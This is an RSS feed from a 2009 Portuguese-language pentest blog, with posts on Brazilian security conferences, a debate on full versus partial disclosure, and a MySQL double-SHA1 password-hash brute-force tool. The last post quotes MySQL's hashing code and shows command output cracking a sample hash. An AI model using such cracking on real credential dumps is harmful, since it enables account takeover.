<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Ulisses Castro Labs</title>
	<atom:link href="http://ulissescastro.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://ulissescastro.wordpress.com</link>
	<description>Pentest, Ethical Hacking and Security Research</description>
	<lastBuildDate>Tue, 17 Nov 2009 04:07:59 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='ulissescastro.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/37305ca67a59ce039a814c046f5c12d4?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>Ulisses Castro Labs</title>
		<link>http://ulissescastro.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://ulissescastro.wordpress.com/osd.xml" title="Ulisses Castro Labs" />
		<item>
		<title>OWASP AppSec Brazil 2009</title>
		<link>http://ulissescastro.wordpress.com/2009/05/05/owasp-appsec-brazil-2009/</link>
		<comments>http://ulissescastro.wordpress.com/2009/05/05/owasp-appsec-brazil-2009/#comments</comments>
		<pubDate>Tue, 05 May 2009 18:52:33 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=229</guid>
		<description><![CDATA[*Retirado com CTRL+C + CRTL+V do blog do Wagner Elias.

&#8220;Após a perseverança do Eduardo Neves, e o excelente trabalho do Lucas Ferreira, conseguimos aprovar o Primeiro OWASP AppSec Brazil. A conferência será realizada nos dias 27 a 29 de outubro de 2009 nas dependências da Câmara dos Deputados, em Brasília, DF é agora o primeiro [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=229&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>*Retirado com <strong>CTRL+C + CRTL+V</strong> do blog do <a href="http://wagnerelias.com/2009/04/30/owasp-appsec-brazil-2009-brasilia-27-30-de-outubro-de-2009/">Wagner Elias</a>.</p>
<p><img class="size-full wp-image-228 alignnone" title="owasp_high" src="http://ulissescastro.files.wordpress.com/2009/05/owasp_high.jpg?w=330&#038;h=330" alt="owasp_high" width="330" height="330" /></p>
<blockquote><p>&#8220;Após a perseverança do <strong><a href="http://camargoneves.com/">Eduardo Neves</a></strong>, e o excelente trabalho do <strong><a href="http://www.sapao.net/">Lucas Ferreira</a></strong>, conseguimos aprovar o Primeiro OWASP AppSec Brazil. A conferência será realizada nos dias 27 a 29 de outubro de 2009 nas dependências da Câmara dos Deputados, em Brasília, DF é agora o primeiro OWASP AppSec Brazil 2009. Isso é uma vitória do Capítulo OWASP Brasil que está tentando trazer o evento para o nosso país desde novembro de 2008 e finalmente conseguiu discutir o assunto com todos os envolvidos e conseguir a aprovação necessária para isso.</p>
<p>A Conferência será promovida pelo OWASP Brasil com o suporte da <a href="http://www.ti-controle.gov.br/" target="_blank">Comunidade TI-Controle</a> para tratar os diferentes assuntos relacionados a Segurança de Aplicações, tais como:</p>
<ul>
<li>Desenvolvimento seguro</li>
<li>Segurança e arquitetura de software</li>
<li>Processos de desenvolvimento de sistemas seguros</li>
<li>Ferramentas para análise de segurança de aplicações</li>
<li>Bibliotecas e frameworks de segurança para aplicações web</li>
<li>Auditoria e testes de segurança em aplicações</li>
<li>Metodologias gerenciais para melhoria da segurança no desenvolvimento de software</li>
<li>Análise de ataques a aplicações</li>
<li>Avaliação de riscos de negócio em aplicações web</li>
<li>Segurança de web services</li>
</ul>
<p>A Conferência terá dois dias de treinamentos (27 e 28 de outubro) seguidos de dois dias de palestras (29 e 30 de outubro). As chamadas de trabalho serão divulgadas neste fim de semana. A página com as informações relacionadas está disponível na Wiki da <a href="https://www.owasp.org/index.php/AppSec_Brasil_2009" target="_blank">OWASP</a>.&#8221;</p></blockquote>
<p><strong>Excelente notícia parabéns a todos os envolvidos!</strong></p>
<p>Desta vez na cidade que estou morando, sem dúvida imperdível, agora é só aguardar a chamada de trabalhos! :)</p>
<p><strong>Enjoy! ;)</strong></p>
Posted in Article  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/229/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/229/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/229/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/229/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/229/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/229/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/229/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/229/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/229/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/229/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=229&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/05/05/owasp-appsec-brazil-2009/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/05/owasp_high.jpg" medium="image">
			<media:title type="html">owasp_high</media:title>
		</media:content>
	</item>
		<item>
		<title>You Sh0t the Sheriff 3.0 &#8211; CFP</title>
		<link>http://ulissescastro.wordpress.com/2009/03/17/you-sh0t-the-sheriff-30-cfp/</link>
		<comments>http://ulissescastro.wordpress.com/2009/03/17/you-sh0t-the-sheriff-30-cfp/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 14:04:20 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=223</guid>
		<description><![CDATA[A chamada para submissao de apresentacoes do YSTS 3.0 esta aberta!
A terceira edicao ocorrera em Sao Paulo, em 22 de Junho de 2009
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
INTRODUCAO
O YSTS e&#8217; um evento unico, de alto nivel, com foco na comunidade de seguranca da informacao brasilera, com participacao de palestrantes nacionais e internacionais.
Buscando combinar apresentacoes de alta qualidade, cobrindo os mais [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=223&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>A chamada para submissao de apresentacoes do <strong>YSTS 3.0</strong> esta aberta!</p>
<p>A terceira edicao ocorrera em <strong>Sao Paulo</strong>, em <strong>22 de Junho de 2009</strong></p>
<p> </p>
<p><img class="alignleft size-full wp-image-222" title="JS609" src="http://ulissescastro.files.wordpress.com/2009/03/clint.jpg?w=590&#038;h=480" alt="JS609" width="590" height="480" /></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<blockquote><p>INTRODUCAO</p>
<p>O YSTS e&#8217; um evento unico, de alto nivel, com foco na comunidade de seguranca da informacao brasilera, com participacao de palestrantes nacionais e internacionais.</p>
<p>Buscando combinar apresentacoes de alta qualidade, cobrindo os mais diversos topicos relacionados com seguranca da informacao, do nivel mais tecnico ao gerencial.</p>
<p>O objetivo e&#8217; permitir que a audiencia compreenda a abrangencia do mundo da seguranca da informacao, que exige entendimento das particularidades dos varios segmentos deste mercado.</p>
<p>Este e&#8217; um evento apenas para convidados. Assim sendo, submeter uma palestra e&#8217;, certamente, um excelente modo de garantir a participacao no evento.</p>
<p>Devido ao sucesso das edicões anteriores, nos mantivemos o mesmo formato:</p>
<p>- &#8211; Ambiente confortavel e descontraido<br />
- &#8211; O local do YSTS 3.0 sera informado apenas aos convidados<br />
- &#8211; Como nas edicoes anteriores, o local secreto sera um bar fechado ou club<br />
- &#8211; E sim havera comida e bebida</p>
<p>TOPICOS</p>
<p>Os focos de interesse, para o YSTS 3.0, sao:</p>
<p>* Sistemas Operacionais<br />
* Topicos relacionados com carreira e gestao<br />
* Dispositivos moveis/Sistemas embarcados<br />
* Auditoria e controle<br />
* Web e coisas 2.0<br />
* Politicas para seguranca da informacao <br />
* Telecomunicacao/Redes/Radio frequencias<br />
* Respostas a incidentes e politicas (uteis) relacionadas<br />
* Guerra cibernetica<br />
* Malware/ BotNets<br />
* Concientizacao de usuarios/Problemas em redes sociais<br />
* Programacao segura<br />
* Espacos e comunidades hacker<br />
* Fuzzing<br />
* Seguranca fisica<br />
* Virtualizacao<br />
* Criptografia/Ofuscacao<br />
* Infraestrutura e sistemas criticos<br />
* CAPTCHAS inviolaveis<br />
* E qualquer outro topico relacionado com seguranca que voce imagine relevante para a conferencia</p>
<p>Nos gostamos de palestras curtas, 30 minutos costuma ser suficiente para passar o recado, se voce achar que necessita de mais tempo, faca essa observacao na sua submissao. </p>
<p>REGALIAS AOS PALESTRANTES</p>
<p>* Auxilio para despesas de viagem e hospedagem, para palestrantes fora de Sao Paulo, no valor de R$ 700,00 (Setecentos reais).<br />
* Cafe da manha, almoco e jantar, durante a conferencia<br />
* Festa pos-conferencia<br />
* Auditoria de produto em pizzarias/churrascarias tradicionais </p>
<p>SUBMISSAO</p>
<p>Cada submissao deve incluir as segintes informacoes:</p>
<p>* Nome, titulo, endereco, email e telefone/numero de contato<br />
* resumo biografico e qualificacoes<br />
* Experiencia em apresentacoes<br />
* Sumario e abstrato da sua apresentacao <br />
* Se ja tiver produzido algum material envie tambem (ppt, pdf, etc.) <br />
* Requisitos tecnicos (alem do projetor) <br />
* Outras publicacoes ou conferencia onde este materia foi ou sera publicado/submetido</p>
<p>Nos aceitamos submissoes e apresentacoes em Ingles, Portugues e Espanhol </p>
<p>DATAS IMPORTANTES </p>
<p>Data final para submissoes &#8211; 10 de Maio de 2009</p>
<p>Notificacao dos autores aceitos &#8211; 20 de Maio de 2009</p>
<p>Envio do material para apresentacoes aceitas &#8211; 15 Junho 2009</p>
<p>Por favor envie sua submissao para cfp/at/ysts.org </p>
<p>CONTATO</p>
<p>Informacoes gerais: b0ard/at/ysts.org</p>
<p>Patrocinio: sponsors/at/ysts.org</p></blockquote>
Posted in Article  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/223/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/223/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/223/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=223&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/03/17/you-sh0t-the-sheriff-30-cfp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/03/clint.jpg" medium="image">
			<media:title type="html">JS609</media:title>
		</media:content>
	</item>
		<item>
		<title>Full Disclosure ou Partial Disclosure</title>
		<link>http://ulissescastro.wordpress.com/2009/03/04/full-disclosure-or-partial/</link>
		<comments>http://ulissescastro.wordpress.com/2009/03/04/full-disclosure-or-partial/#comments</comments>
		<pubDate>Wed, 04 Mar 2009 18:27:12 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=208</guid>
		<description><![CDATA[Estava lendo a lista de e-mails da security focus hoje quando me deparei com uma assinatura muito interessante onde dizia:

 
 
 
 
 
 
 
 
 
 
 
&#8220;All vulnerabilities deserve a public fear period prior to patches becoming available.&#8221;

&#8211;Jason Coombs on Bugtraq
Achei a frase bem interessante &#8220;filosóficamente&#8221; falando, mas queria um pouco mais de contexto e me surpreendi quando encontrei, com um pouco de [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=208&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Estava lendo a lista de e-mails da security focus hoje quando me deparei com uma assinatura muito interessante onde dizia:</p>
<p><img class="alignleft size-full wp-image-209" title="leak" src="http://ulissescastro.files.wordpress.com/2009/02/leak.png?w=496&#038;h=329" alt="leak" width="496" height="329" /></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<blockquote><p><em>&#8220;All vulnerabilities deserve a public fear period prior to patches becoming available.&#8221;<br />
</em></p>
<p><em>&#8211;Jason Coombs on Bugtraq</em></p></blockquote>
<p>Achei a frase bem interessante &#8220;filosóficamente&#8221; falando, mas queria um pouco mais de contexto e me surpreendi quando encontrei, com um pouco de google hack o e-mail completo de <a href="http://science.org/">Jason Coombs</a>.</p>
<p>Para quem interessar o &#8220;google dork&#8221; ficou assim: <a href="http://www.google.com/search?hl=en&amp;client=safari&amp;rls=en-us&amp;q=%22Jason+Coombs%22+site%3Aseclists.org+intext%3A%22deserve+a+public%22&amp;btnG=Search" target="_blank">&#8220;Jason Coombs&#8221; site:seclists.org intext:&#8221;deserve a public&#8221;</a></p>
<p>Abaixo vou colar a parte mais interessante:</p>
<blockquote><p>&#8220;<em>All vulnerabilities deserve a public fear period prior to patches becoming available. The alternative is complacency and increased ignorance due to the removal of the short window of opportunity for every admin and programmer who cares to do so to contribute openly to analysis of the threat. When vulnerabilities are disclosed along with alleged fixes, fewer people bother to mount any type of incident response in spite of the fact that the fixes often fail or introduce new vulnerabilities. Closed source software is especially destructive to security in this respect because it encourages blind acceptance of alleged fixes. Anyone can analyze and discuss the threat openly but the solution we receive from our vendors is closed and its technical design is arbitrary. This makes no sense. There is a world full of smart people who kick and scream in an attempt to gain some level of influence in the technical design of security-sensitive features of closed source products and with few <span style="font-style:normal;"><em>exceptions closed source software vendors systematically ignore our input.</em>&#8220;</span></em></p></blockquote>
<p>Pra quem se interessar em ler o <a href="http://seclists.org/fulldisclosure/2003/Aug/0019.html" target="_blank">ponto de vista completo</a> ou <a href="http://translate.google.com.br/translate?prev=hp&amp;hl=pt-BR&amp;u=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2003%2FAug%2F0019.html&amp;sl=en&amp;tl=pt" target="_blank">traduzido</a> &#8220;<strong>daquele jeito</strong>&#8221; pelo google.</p>
<p>Quando compartilhei com um dos meus amigos de &#8220;<strong>mente perversa</strong>&#8220; fui logo recebendo o seguinte &#8220;<strong>patch</strong>&#8221; para a frase:</p>
<p> </p>
<blockquote><p><em>&#8220;All vulnerabilities deserve a <strong>365day period of use</strong> before becoming public available.&#8221;</em></p>
<p><em>&#8211;Unknown closer friend</em></p></blockquote>
<p> </p>
<p>Cada um tem uma opinião sobre este assunto e creio que não existe uma resposta pontual e depende muito da situação, lembrando que um full disclosure &#8220;0day&#8221; pode gerar uma baita dor de cabeça judicialmente falando.</p>
<p>Convido a quem se interessar em postar sua opnião, full disclosure ou partial disclosure&#8230;</p>
<p>Convido também o Sr. <a href="http://www.midstorm.org/~fike/weblog/" target="_blank">Fernando Ike</a> a continuar este <a href="http://www.google.com/search?hl=en&amp;rls=en-us&amp;q=define%3Ameme&amp;btnG=Search" target="_blank">meme</a>.</p>
<p>Enjoy! ;)</p>
Posted in Article  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/208/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/208/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/208/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=208&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/03/04/full-disclosure-or-partial/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/02/leak.png" medium="image">
			<media:title type="html">leak</media:title>
		</media:content>
	</item>
		<item>
		<title>uCon Treinamentos e Palestrantes</title>
		<link>http://ulissescastro.wordpress.com/2009/02/04/ucon-treinamentos-e-palestrantes/</link>
		<comments>http://ulissescastro.wordpress.com/2009/02/04/ucon-treinamentos-e-palestrantes/#comments</comments>
		<pubDate>Wed, 04 Feb 2009 15:02:14 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=197</guid>
		<description><![CDATA[Literalmente um CTRL+C + CTRL+V no post do brother Sp0oKeR
Os cursos do pessoal da Conviso são altamente recomendados! ;)

 
 
 
 
 
 
 
 
Saiu uma pré lista de palestrantes para a segunda edição da uCon que ocorrerá em Recife em fevereiro.
Keynote: Dispelling the myths and discussing the facts of global cyber-warfare 
Jayson Street
Practical (Introduction to) Reverse Engineering
Julio Auto, Independent security researcher
Intro to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=197&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Literalmente um CTRL+C + CTRL+V no post do brother <a href="http://spookerlabs.multiply.com/journal/item/352/uCon_-_Palestrantes_e_Treinamentos" target="_blank">Sp0oKeR</a></p>
<p>Os cursos do pessoal da <a href="http://convisosec.com/" target="_blank">Conviso</a> são altamente recomendados! ;)</p>
<p><img class="alignleft size-full wp-image-201" title="ucon" src="http://ulissescastro.files.wordpress.com/2009/02/ucon.png?w=523&#038;h=249" alt="ucon" width="523" height="249" /></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p>Saiu uma pré lista de palestrantes para a segunda edição da uCon que ocorrerá em Recife em fevereiro.</p>
<p>Keynote: Dispelling the myths and discussing the facts of global cyber-warfare </p>
<p>Jayson Street</p>
<p>Practical (Introduction to) Reverse Engineering</p>
<p>Julio Auto, Independent security researcher</p>
<p>Intro to Windows Kernel Security Development</p>
<p>Stephen Ridley, Matasano</p>
<p>Advanced Payload Strategies: What is new, what works and what is hoax?</p>
<p>Rodrigo Rubira Branco (BSDaemon), CheckPoint / COSEINC</p>
<p>Advanced SQL Injection</p>
<p>Joseph McCray, Rapid7 / LearnSecurityOnline.com</p>
<p>Secure Log Centralization, Analysis &amp; Security Visualization</p>
<p>Gustavo Monteiro, Independent security researcher</p>
<p>GSM For Fun and Profit</p>
<p>David Batanero, Independent researcher</p>
<p>Exploiting PDF Readers</p>
<p>Felipe Andres Manzano, Nimbuzz.com</p>
<p><a href="http://www.ucon-conference.org/speakers.php" target="_blank">http://www.ucon-conference.org/speakers.php</a></p>
<p> </p>
<p>A uCon além das palestra, terá alguns treinamentos entre eles dos meus amigos da conviso sobre web security com um preço bem acessível. </p>
<p>Mais info:</p>
<p><a href="http://www.ucon-conference.org/web-hacking-techniques.php?hl=pt" target="_blank">http://www.ucon-conference.org/web-hacking-techniques.php?hl=pt</a></p>
<p> </p>
<p>Espero ter a oportunidade de comparecer&#8230; :)</p>
<p>Enjoy! ;)</p>
Posted in Article  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/197/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/197/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/197/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/197/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/197/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/197/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/197/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/197/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/197/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/197/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=197&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/02/04/ucon-treinamentos-e-palestrantes/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/02/ucon.png" medium="image">
			<media:title type="html">ucon</media:title>
		</media:content>
	</item>
		<item>
		<title>Yet Another Brute Force Tool (mysql)</title>
		<link>http://ulissescastro.wordpress.com/2009/02/04/yet-another-brute-force-tool-mysql/</link>
		<comments>http://ulissescastro.wordpress.com/2009/02/04/yet-another-brute-force-tool-mysql/#comments</comments>
		<pubDate>Wed, 04 Feb 2009 14:26:29 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=187</guid>
		<description><![CDATA[Desta vez foi a curiosidade que me levou a este brute&#8230; seguindo praticamente a mesma linha de todos os outros (no código em si), mas com um pouco de evolução, este brute force para hash de mysql (double SHA1) além de utilizar wordlist para o brute, adicionei uma opcao que transforma qualquer texto em hash no formato [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=187&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Desta vez foi a curiosidade que me levou a este brute&#8230; seguindo praticamente a mesma linha de todos os outros (no código em si), mas com um pouco de evolução, este brute force para hash de mysql (double SHA1) além de utilizar wordlist para o brute, adicionei uma opcao que transforma qualquer texto em hash no formato mysql&#8230; talvez seja inútil, mas vai saber&#8230; alguem pode precisar disso eheheh&#8230;</p>
<p><img class="alignleft size-full wp-image-188" title="smashed" src="http://ulissescastro.files.wordpress.com/2009/02/smashed.png?w=498&#038;h=346" alt="smashed" width="498" height="346" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><strong>MySQL double SHA1 hash wordlist brute forcer (mysqlsha1brute.py.txt) [</strong><a href="http://packetstormsecurity.org/filedesc/mysqlsha1brute.py.txt.html" target="_blank"><strong>download</strong></a><strong>]</strong></p>
<p>- This cracker works against hash created by MySQL to store passwords.</p>
<p>Baixando os <a href="http://dev.mysql.com/downloads/">sources do mysql</a> e descompactando fiz um:</p>
<p><code>$ grep -ir "password" mysql-5.1.30/*</code></p>
<p><strong> </strong>Que me levou ao arquivo &#8220;<strong>mysql-5.1.30/sql/password.c</strong>&#8220; onde traz exatamente o que é preciso para replicar a função que gera o hash em si, repare que utiliza uma RFC (<a href="http://www.ietf.org/rfc/rfc2289.txt" target="_blank">2289</a>, <a href="http://www.ietf.org/rfc/rfc3174.txt" target="_blank">3174</a>)  que padroniza o processo, segue abaixo um trecho do código&#8230;</p>
<p><code>/*<br />
MySQL 4.1.1 password hashing: SHA conversion (see RFC 2289, 3174) twice<br />
applied to the password string, and then produced octet sequence is<br />
converted to hex string.<br />
The result of this function is used as return value from PASSWORD() and<br />
is stored in the database.<br />
SYNOPSIS<br />
make_scrambled_password()<br />
buf       OUT buffer of size 2*SHA1_HASH_SIZE + 2 to store hex string<br />
password  IN  NULL-terminated password string<br />
*/</code></p>
<p><code>void<br />
make_scrambled_password(char *to, const char *password)<br />
{<br />
SHA1_CONTEXT sha1_context;<br />
uint8 hash_stage2[SHA1_HASH_SIZE];</code></p>
<p><code> </code></p>
<p><code> mysql_sha1_reset(&amp;sha1_context);<br />
/* stage 1: hash password */<br />
mysql_sha1_input(&amp;sha1_context, (uint8 *) password, (uint) strlen(password));<br />
mysql_sha1_result(&amp;sha1_context, (uint8 *) to);<br />
/* stage 2: hash stage1 output */<br />
mysql_sha1_reset(&amp;sha1_context);<br />
mysql_sha1_input(&amp;sha1_context, (uint8 *) to, SHA1_HASH_SIZE);<br />
/* separate buffer is used to pass 'to' in octet2hex */<br />
mysql_sha1_result(&amp;sha1_context, hash_stage2);<br />
/* convert hash_stage2 to hex string */<br />
*to++= PVERSION41_CHAR;<br />
octet2hex(to, (const char*) hash_stage2, SHA1_HASH_SIZE);<br />
}</code><br />
Opção que adicionei na tool (inútil? eheheh):</p>
<p><code>$ ./mysqlsha1brute.py -t darkc0de<br />
[*] MySQL double SHA1 hasher (by thebug)<br />
[*] word: darkc0de<br />
[*] hash: *E742BF513935907CB8E6DA91CCB4217BC4702AF6</code></p>
<p>Como utilizar?</p>
<p><code>$ ./mysqlsha1brute.py -H *850AD02B26C1626F64E7D28390E103EC7034C573 -w wordlist.txt<br />
[*] MySQL double SHA1 hash brute force (by thebug)<br />
[*] hash: *850AD02B26C1626F64E7D28390E103EC7034C573<br />
[*] 3107 word(s) loaded.<br />
[*] brute force started.<br />
[*] got it!<br />
[*] password is: gandalf</code></p>
<p>Espero que a tool tenha alguma utilidade para os esquecidos de plantão e simpatizantes&#8230;<br />
<strong> </strong></p>
<p><strong>Enjoy! ;)</strong></p>
